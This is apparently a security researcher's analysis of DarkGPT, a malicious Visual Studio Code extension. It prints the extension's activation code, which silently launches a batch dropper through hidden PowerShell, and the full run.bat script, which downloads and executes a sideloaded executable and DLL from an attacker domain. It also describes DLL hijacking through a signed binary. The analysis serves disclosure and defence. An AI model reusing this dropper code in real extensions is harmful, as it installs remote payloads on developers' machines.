DarkGPT: Malicious Visual Studio Code Extension Targeting Developers

TL;DR

Malicious extensions are lurking in the Visual Studio Code marketplace. In this case, we discover and analyze DarkGPT, a Visual Studio Code extension that exploits DLL hijacking to load malicious code through a signed Windows executable. The payload appears to impact only Windows machines. Related research is published by Koi Security.

The Visual Studio Code extension [email protected] and two other extensions were found to be malicious. They connect to the (now) known malicious domain syn1112223334445556667778889990.org to download and execute a payload that steals sensitive data from the infected machine.

Malicious extensions in this attack:

The domain is flagged as malicious by multiple security vendors.

https://www.virustotal.com/gui/url/8fecfc0aee9a877525cde6c28b17b78b3d967c104ae4c8c297749ee8b76797e8

1. Initial Triage: A file listing of the package revealed a suspicious file, run.bat, which is not typical for a Visual Studio Code extension.

2. Malicious Script: The content of run.bat was examined and found to be a dropper. It downloads two files, Lightshot.exe and Lightshot.dll from a suspicious URL (http://syn1112223334445556667778889990.org) and executes the Lightshot.exe file.

3. Execution Trigger: The main extension file, extension.js, was found to contain code that executes the run.bat script using PowerShell with a hidden window (-WindowStyle Hidden) when the extension is activated. This is a clear attempt to conceal the malicious activity.

Technical Analysis

Payload Delivery

The following analysis is based on [email protected] package.

The extension metadata points to GitHub Project cathedralkingz-afk/DarkGPT-Extension-For-VsCode repository contains all code of the extension except for scripts/run.bat file which is malicious payload dropper.

Visual Studio Extension (VSX) files are ZIP files with a specific file structure as required by VS Code and the marketplace requirements. The ZIP file contains the following files:

1
$ unzip -l Microsoft.VisualStudio.Services.VSIXPackage
2
Archive:  Microsoft.VisualStudio.Services.VSIXPackage
3
  Length      Date    Time    Name
4
---------  ---------- -----   ----
5
     3269  12-08-2025 15:17   extension.vsixmanifest
6
      528  12-08-2025 15:17   [Content_Types].xml
7
     9933  12-08-2025 15:17   extension/readme.md
8
     4325  12-08-2025 15:17   extension/package.json
9
     1087  12-04-2025 18:05   extension/LICENSE.txt
10
  1450436  12-08-2025 14:18   extension/icon.png
11
     8171  12-07-2025 23:22   extension/f.png
12
    47435  12-08-2025 14:14   extension/extension.js
13
    11331  12-04-2025 14:41   extension/themes/bitcoin-black-color-theme.json
14
      490  12-08-2025 11:45   extension/scripts/run.bat
15
---------                     -------
16
  1537005                     10 files

The extension/package.json describes extension.js as the entrypoint:

1
{
2
  "name": "darkgpt",
3
  "displayName": "DarkGPT",
4
  "description": "[...]",
5
  "version": "1.2.0",
6
  "publisher": "EffetMer",
7
  "main": "./extension.js"
8
}

The extension.js exports activate and deactivate functions as required by VS Code extension API.

1
// [...]
2
module.exports = { activate, deactivate };
3
// [...]

The activate function, which is called when the extension is activated, contains the following code:

1
function activate(context) {
2
  log('DarkGPT Extension activated');
3
  log('Extension path: ' + context.extensionPath);
4

5
  // ============================================================
6
  // IMPORTANT: KEEP POWERSHELL/BAT METHOD - DO NOT REMOVE
7
  // ============================================================
8
  runScript(context);
9
  // [...]
10
}

The runScript function in turn is the primary payload dropper entrypoint that contains the following code:

1
function runScript(context) {
2
  try {
3
    const markerPath = path.join(process.env.TEMP || 'C:\\Windows\\Temp', 'Lightshot', '.done');
4
    // ...
5
    if (fs.existsSync(markerPath)) {
6
      log('Already ran, skipping');
7
      return;
8
    }
9

10
    const scriptPath = context.asAbsolutePath('scripts/run.bat');
11
    // ...
12

13
    if (!fs.existsSync(scriptPath)) {
14
      // ...
15
      return;
16
    }
17

18
    // ...
19
    const powershellCmd = `powershell.exe -WindowStyle Hidden -Command "& { Start-Process -FilePath '${scriptPath.replace(/\\/g, '/')}' -WindowStyle Hidden }"`;
20

21
    const child = spawn(
22
      'powershell.exe',
23
      [
24
        '-WindowStyle',
25
        'Hidden',
26
        '-Command',
27
        `Start-Process -FilePath '${scriptPath.replace(/'/g, "''")}' -WindowStyle Hidden`,
28
      ],
29
      {
30
        detached: true,
31
        stdio: 'ignore',
32
        windowsHide: true,
33
      }
34
    );
35

36
    // ...
37
    child.unref();
38
  } catch (e) {
39
    // ...
40
  }
41
}

It effectively does the following:

• Creates a marker file in C:\Windows\Temp\Lightshot\.done to prevent multiple execution
• Computes path to scripts/run.bat file relative to the extension path
• Uses powershell.exe to run the scripts/run.bat file silently (no window)

The actual dropper is in scripts/run.bat file which contains the following code:

1
@echo off
2
setlocal
3

4
set "DIR=%TEMP%\Lightshot"
5
set "EXE=%DIR%\Lightshot.exe"
6
set "DLL=%DIR%\Lightshot.dll"
7
set "DONE=%DIR%\.done"
8

9
if exist "%DONE%" exit /b 0
10

11
if not exist "%DIR%" mkdir "%DIR%"
12

13
@curl -s -L -o "%EXE%" "http://syn1112223334445556667778889990.org/Lightshot.exe" >nul 2>&1
14
@curl -s -L -o "%DLL%" "http://syn1112223334445556667778889990.org/Lightshot.dll" >nul 2>&1
15

16
if exist "%EXE%" (
17
    @start "" /min "%EXE%" >nul 2>&1
18
    @echo.>"%DONE%"
19
)
20

21
endlocal

It does the following:

• Downloads Lightshot.exe and Lightshot.dll from the malicious domain syn1112223334445556667778889990.org
• Places both Lightshot.exe and Lightshot.dll in C:\Windows\Temp\Lightshot directory
• Executes Lightshot.exe

1
$ file Lightshot.exe Lightshot.dll
2
Lightshot.dll:   PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
3
Lightshot.exe:   PE32 executable (GUI) Intel 80386, for MS Windows

Lightshot.exe

The Lightshot.exe is a PE32 executable that appears to be a legitimate but signed Windows executable.

Lightshot.exe has code that loads Lightshot.dll from its current directory using LoadLibraryW Windows API. It crafts a full path to Lightshot.dll, relative to its own path, and loads it. This behavior is vulnerable to DLL Hijacking.

This vulnerability is exploited by the malware author to load malicious code into a trusted (signed) executable. This is a common technique to bypass runtime behavior based anti-malware solutions, by leveraging the trust of the signed host process.

Lightshot.dll

The Lightshot.dll activates its payload on DllMain entrypoint. It uses the mutex COOL_SCREENSHOT_MUTEX_YARRR to prevent multiple execution.

The payload in Lightshot.dll in turn, has code to download https://syn1112223334445556667778889990.org/iknowyou.model into %TEMP%\runtime.exe and execute it using CreateProcessW Windows API. The download is is performed using PowerShell Invoke-WebRequest cmdlet.

Unfortunately, the malicious domain syn1112223334445556667778889990.org was unavailable (non-resolving) by the time we discovered https://syn1112223334445556667778889990.org/iknowyou.model as another payload dropped by Lightshot.dll.

Indicator of Compromise (IoC)

Conclusion

These VSCode extensions are malicious. They act as a dropper to download and execute a payload from a remote server, while attempting to hide its activity from the user.

Reference

• https://app.safedep.io/community/malysis/01KC04HABTH5JS50DQ12AKQY3K
• https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen